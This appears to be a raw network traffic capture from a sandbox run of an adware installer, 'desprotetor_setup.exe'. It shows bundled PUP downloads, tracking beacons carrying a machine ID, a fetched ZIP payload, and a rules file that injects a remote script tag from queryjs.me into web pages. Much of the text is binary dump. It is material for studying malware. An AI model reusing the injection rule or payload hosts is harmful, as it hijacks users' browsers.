HEAD /desprotetor_setup.exe HTTP/1.1
Accept: */*
Host: VVV.1strequest.me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/octet-stream
Content-Length: 1117309
Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 30 Apr 2015 23:07:44 GMT..Content-Type: application/octet-stream..Content-Length: 1117309..Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT..Connection: keep-alive..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..CC: UA..Accept-Ranges: bytes......
GET /desprotetor_setup.exe HTTP/1.1
Range: bytes=0-1117308
Accept: */*
Host: VVV.1strequest.me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/octet-stream
Content-Length: 1117309
Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Range: bytes 0-1117308/1117309
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........H............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...H............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /v4/searchprotect/535559167_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.95 ms","message":"store 4 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"1.95 ms","message":"store 4 action and 0 update "}..0..
GET / HTTP/1.1
Host: VVV.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg
Content-Length: 259
Date: Thu, 30 Apr 2015 23:07:20 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg">here</A>...</BODY></HTML>..HTTP/1.1 302 Found..Cache-Control: private..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg..Content-Length: 259..Date: Thu, 30 Apr 2015 23:07:20 GMT..Server: GFE/2.0..Alternate-Protocol: 80:quic,p=1..<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg">here</A>...</BODY></HTML>....
GET /gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/ocsp-response
Content-Length: 1474
Connection: keep-alive
Set-Cookie: __cfduid=d627dcfacd8ecab9edfc9af1368c6b67f1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 91499122d126a896a1d8c34863d5e7acd6de4b53
Expires: Fri, 01 May 2015 04:15:35 GMT
Last-Modified: Thu, 30 Apr 2015 16:15:35 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1df6edc0de2e046d-FRA
0..........0..... .....0......0...0......,p... ...Gy.....'..B..20150430161535Z0u0s0K0... ........k..vY.d..X.R*.....C....n......>..t]..../Pz...!..5..,.....}*..4....20150430161535Z....20150501041535Z0...*.H...........`y._{V.....x%..v.t.w..[|....T..D>.2...)."..j.7...qpM..&V....4....,K..B.3.....!..v <#....F.J...j(@..o..6.e,...\..?7.......n..~...R...6.../"../&~F...4N4e..y<.<7.yu...{......r~...&....D....B..VW.t4....-.........JI.a.FD...8..A\..li.....^......l.3;..v$n..l.E.M.....0...0...0...........!~.(......gxK.2.T0...*.H........0Q1.0...U....BE1.0...U....GlobalSign nv-sa1'0%..U....GlobalSign CodeSigning CA - G20...150303092326Z..150603082326Z0}1.0...U....BE1.0...U....GlobalSign nv-sa1:08..U...1GlobalSign CodeSigning CA - G2 OCSP responder - 11.0...U....201503031023000.."0...*.H.............0..............E..%p...1.._N.DD..y:\Q...........\.2!PFr...=.C-..dYY........e....yAy...U.HZ3.O....w&Z.:.>.[......>.(..l..t.g3@X&..*i......i.u{...C.....B...........gj......s.!..~..].mS.#.,A @.......b...i.*G....2l.u.....<ISC....F......}0....w2W..KC......6_.........Wua........0..0...U....0.0...U...........0...U.%..0... .......0... .....0......0...U......,p... ...Gy.....'..B0...U.#..0....n......>..t]..../Pz0...*.H.............y..6.-....H.~...H.....L..:G.....p...C..:.... /...5M.^}...5Q.~.....VC...Y.Z(I.k....P. s.!..b..,.A........~..y.G.H....N._......J.........|.k4..../...........('.....)..:..t....-..}e&.*..:*8IH|2s::r..63..Y..G.....#.- ........N....R..X..@. j.,.........N.h........
<<< skipped >>>
GET /v4/sof-installer/535559167_198339_B48A115F?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.dlzip1.istartsurf.finish,5 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.....H.....0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:15 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..Content-Encoding: gzip..57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.....H.....0..
GET /pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar HTTP/1.1
Host: download.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=900000-1199999
Connection: keep-alive
HTTP/1.1 206 Partial Content
Last-Modified: Wed, 26 Nov 2014 16:59:55 GMT
ETag: "4b1e700-2dc5623-508c5f506dac8"
Server: Apache
X-Backend-Server: ftp3.dmz.scl3.mozilla.com
Content-Type: application/octet-stream
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
X-Cache-Info: cached
Cache-Control: max-age=255584
Expires: Sun, 03 May 2015 22:07:04 GMT
Date: Thu, 30 Apr 2015 23:07:20 GMT
Content-Range: bytes 900000-1199999/47994403
Content-Length: 300000
Connection: keep-alive
d,.f.\s..H.vB9..b.I`.b..8%..g..m....x..*.....{....?..u;f....._nU._......y q....].~..N...=....c.:..wuz. g...O?....*-..U..,..]u.iE...9..s.gN..5.A.v....;BK..H.....>.J..T.n.#. .......^:...9.giR..h.s..dX[:..D..3...I.`.5..pb.s.-..........P...M.3.,.Z.....t.&Z$nJ."o'.\..O.h.B,Y.......W.........!<.eu.BWsJ.=...Z.l....~..l'...l..9l|....d.x....Fw.B.Gv8....2.XJ.Ed..r...V.J.%.$.~^..N..b.....!..w h-..3.......C[m......R.*/.@.mJg..L.......t.#A....X......D.B.....w.d...$6....8.I....GP..e...o\.UJ.u..yX.I....c..<KG..T......L..mT..,7rA..g..".?....../.&...dI......&.. .k..p.....s..J\..J..p....!.1(...U...A=.......D.....{.H.....v..5!..w.......&.s|......=...V...Ig..Dp..@k..*...o".......Q..r..l]u.u/...(.i......(..j........1.g7..f._N..eVm..~...)%.hX0Zm............z.w...R.".^.hI.Q..nZ@..|....@l4....z...f..ll..._.....(!$....gR..;O.$$#...w.{.k.hB.4.?.....u.$...&}.......Od.. ....".......;[.7@.......n....h$.n.[...B?n......$.\%2........!S...l.(.k...:......c...h.f/...x..VZ..A..R*~....dHh.....9...I.m IW..a1.$u8..o..@........h<...i.v./-.\-......d..~h..H. ..6.M..0....Z.A.T....N..K @....j%....U:.^..z...~.I.....F"..J...`.......1F$...s.D......x$O6....;r.P./.es4.*......n.{g._.U..R?(......|.....B.......m.N....p&.Z......*..ZQ..VR..[..8@".1xy.P..........z.n^.<....^...n3...1...'Ki../...n.A.........cs...0n@Zh.W....B..<.M$..2..|.v.n/6...V........lE/......w8-........-R..\e...WA...756.H.]/d.....-......'......... ..4J@.<.S.4....Fu6%...du.iP.....*>........%/..>#..}....._...c.b.f..!...D%L...../.......,...o&u...#..1...Ex.k.P.. .S.J/......
<<< skipped >>>
GET /services/rules.txt?dummy=100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:37 GMT
Content-Type: text/plain
Content-Length: 111
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT
ETag: "5ac277-6f-514f84cc55900"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:37 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.ncupons|nncupons.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:37 GMT..Content-Type: text/plain..Content-Length: 111..Connection: keep-alive..Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT..ETag: "5ac277-6f-514f84cc55900"..Cache-Control: max-age=600..Expires: Thu, 30 Apr 2015 23:17:37 GMT..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..Accept-Ranges: bytes..</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.ncupons|nncupons...
GET /?product=firefox-34.0.5-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=900000-1199999
Cookie: optimizelySegments={"245617832":"none","245875585":"direct","245677587":"ff","246048108":"false","869421433":"true"}; optimizelyEndUserId=oeu1401956287616r0.2603029596469415; optimizelyBuckets={}; __utma=150903082.1617578787.1401956289.1401956289.1401956289.1
Connection: keep-alive
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: bouncer2.webapp.scl3.mozilla.com
Cache-Control: max-age=60
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:15 GMT
Location: hXXp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar
Keep-Alive: timeout=3, max=499
Content-Length: 0
Connection: Keep-Alive
X-Cache-Info: cached
HTTP/1.1 302 Found..Server: Apache..X-Backend-Server: bouncer2.webapp.scl3.mozilla.com..Cache-Control: max-age=60..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:15 GMT..Location: hXXp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar..Keep-Alive: timeout=3, max=499..Content-Length: 0..Connection: Keep-Alive..X-Cache-Info: cached..
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEGO+CyDUoFQBjrKVo87pCRc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=563288, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 11:40:21 GMT
Expires: Thu, 7 May 2015 11:40:21 GMT
Date: Thu, 30 Apr 2015 23:12:13 GMT
Connection: keep-alive
0..........0..... .....0......0...0......N$p...v....1.;..vn....20150430114021Z0s0q0I0... ...................F....0.yV......{&.K......&.......c.. ..T.............20150430114021Z....20150507114021Z0...*.H.............>6K&Pfq...g.MF....Kp..>.-.3............Cpa.X...\...........2..W.c=k6m>.z....SB.$[s..|#...;vO.6......'$.k.0...H.4.`...M....Iq...&...1....i..!..'.A4.l.H..... ...".p.r%'.r........,...Sa.b.0cx.Oh.7..Q.......Uu.(^...q.9......bh...Q.".y..MO..1 ....s......\....P.....0...0...0............F...I]A(M..s@.0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA0...150225000000Z..150526235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Class 3 Code Signing 2010 OCSP Responder0.."0...*.H.............0.........q<...A...#......A...u..Lz.............o..D.vQ%..s.......f....e../jI.d.W.....|K;.j5...#.B%.]..~S.... .|;S.&.....N..`...5.....!D.p....M/.. ..;j...q..`6...2.Ck..BnLHvCZn%....,.w.Ooi..z'...\.Yx......b..L...5.o..o..{..}.........%e.....N..._i........*Bc....:yQg.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-31830...*.H..............-..^.........f.P`...s.....8.....V.......... .... B.(@-
<<< skipped >>>
GET /install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com
HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Thu, 30 Apr 2015 23:07:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 668
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<h1>404 Not Found</h1>..<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>..Please report this message and include the following information to us.<br/>..Thank you very much!</p>..<table>..<tr>..<td>URL:</td>..<td>hXXp://log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F</td>..</tr>..<tr>..<td>Server:</td>..<td>us-pub00.v9.com</td>..</tr>..<tr>..<td>Date:</td>..<td>2015/04/30 18:07:19</td>..</tr>..</table>..<hr/>Powered by Tengine/1.2.2..</body>..</html>..HTTP/1.1 404 Not Found..Server: Tengine/1.2.2..Date: Thu, 30 Apr 2015 23:07:19 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 668..Connection: keep-alive..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<h1>404 Not Found</h1>..<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>..Please report this message and include the following information to us.<br/>..Thank you very much!</p>..<table>..<tr>..<td>URL:</td>..<td>
<<< skipped >>>
GET /services/rules.txt?dummy=779 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:21 GMT
Content-Type: text/plain
Content-Length: 111
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT
ETag: "5ac277-6f-514f84cc55900"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:21 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.ncupons|nncupons.t>....
GET /services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:22 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=479015, public, no-transform, must-revalidate
Last-Modified: Wed, 29 Apr 2015 12:15:02 GMT
Expires: Wed, 6 May 2015 12:15:02 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..20150429121502Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5..........^.3@..cL.1.......20150429121502Z....20150506121502Z0...*.H...............d...W.P".....!..%.p..0....e."..<.\l&.. zl%ln@{.Sc.....l....;R....@).(E.D...c.\.Q.L&...;]A$:.o1.(>.l..G#Db.!....bO..T=&}?.`.....w.}1[.1.P.{[.%..Lji..`H...............Z...9M\\du8.X.N..c.A.:j$.p.2...0.....7.2x....C"."...1(.LA6...&....SH,..../....fm...5@.-.....#0...0...0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Class 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.............m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...:.C.Q.i~rl..<..krS..8.B..o].y..L.4...iB@..s.....mw.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...*.H
<<< skipped >>>
GET /3517/1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 May 2015 01:05:22 GMT
Content-Type: application/zip
Content-Length: 2211012
Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
PK........}*.F.}&A............479.jsonS...=Uu......u~. .......6~..&.z..e......s....^s&<..O....E...=...kgs..m.2..j.%.P.g..._...S>...C^.........Y...$.L..`..UtZ.... wm..L:...0>....:=.]..... \.^\9Y8yka`.k.m.f.96..a..f.k.&...%.........?..Q.....w4....k;q....c.V......<.jOn..`Y.qm..]..........yq.#D.D.l..C..u{'.8.....T7]zI..{.......WQ.*z|....e..l..v.....c..:g....'..b.q~..wH.=U~.Y.{.....7.N....T.s.4.L..s..6q..f_...nY...../.l?=-i...y.m~E.../.u.MQ ...S~......^....i.G{.........2...y..........-.ya...ss.."....s~...........'.p..".....G.....-#..G~....q..PK........}*.F.........<......uninstallDlg2.xml.[m..6..~@..........v.b.....4..Z..".%.fW&U......7.(Y...\s.].v.X.4.....3b..._%....r6...m!.".S..Z...gl.Lb...32..Hf..^.....)........O..;q-..T.....z6.......s.p1.>.........|....1..Y......%; t..xjI...Q...M.9N2.<;@.~.p....\..A....\..u.....Q%...u..e.... ..'9\........\~.. .!I......v....x.t_D.$Bw0.V.......4..8...Es....0L..lF..ET..8... p.k-x..qR.....~Kn.gK..'.d....%;...%GK..B.k.[.w....H.$y.Em.R...:Y.....l.v#..(.d.....ntgA....4.j.{m.W.3V.=.O(.c....P.WT:X.?2.E.....>..k...=......7b~.]..`.....(.............2_.L......:@...F...M......1..".9X.....c.!3H%...d...41E2./H...p....R.3........1`.......@....W.......2.....e..1n.,.-C..2..)f....M.@...N...<....r9..../.],!.*...M9..cO.h..c..Fr..`......3....<..Q....V.*.~.....5....S...I..nj..Q.A.. .....bn.2!.9$ .....U%.....p....v.-*.. *C7{...F......4wj..2...2.k....tU'63....r.m.~............a.S....W..V ...z..u.~.s...gg...Z\q..'F.8..Rm..V.kT.. E^X)j..QU*>y..\.j.....$...x.=.....kI.-..p
<<< skipped >>>
GET /gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/ocsp-response
Content-Length: 1493
Connection: keep-alive
Set-Cookie: __cfduid=d9475cef6091554b34cfafc407203a1381430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 8fc8d7ab1aa7313fa97fcb4c95a3d6ccbfe23096
Expires: Thu, 30 Apr 2015 23:19:16 GMT
Last-Modified: Thu, 30 Apr 2015 11:19:16 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1df6edbd501301b1-FRA
0..........0..... .....0......0...0.......0?.....!...>., ......20150430111916Z0u0s0K0... ........)...nd.@.N....f........J.Z.M1...^./.....2k...!'=e.,.KdXe.I..6m....20150430111916Z....20150430231916Z0...*.H............ m.......#%F...x...hbV..x.MD.<.F....k.U..v......C]......>1..Iq.3...[Kp>.. .......S.M.Da.. .3]f~/.*.o.9...h.G...r~..B.*.,...{..wx...)..4.....@....G.....!>..t...;.7...m}...|_..).->2......$..o.?.&*.2.....}.&B...h...o.@SK.........G..j<h...L...}....o.......sea....0...0...0...........!.}.*./..(.....C.0...*.H........0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G20...150318093923Z..150618083923Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1C0A..U...:GlobalSign CodeSigning CA - SHA256 - G2 OCSP responder - 21.0...U....201503181039000.."0...*.H.............0..........]W0..;Cq..t....H.mQ...C.PN...0...Z.p`xT`...g...^c.`....&S..<.w.......o&..,...n=.{i`\....Fhn.....i%.b,.IS... .]...Vh...~._i.Y......sF%...I..V.I]Kn.x.....h........)...5..F.6m0;....l..B..d-.ha...>T._.o.7...."..e....~5a...=..9.h'F>.X...k.l....gCC'S.....@............0..0...U....0.0...U...........0...U.%..0... .......0... .....0......0...U.......0?.....!...>., ....0...U.#..0....J.Z.M1...^./.....2k0...*.H.................&..Y.7).!......9s..~.N..4..uz.t.K2Y..=. ... 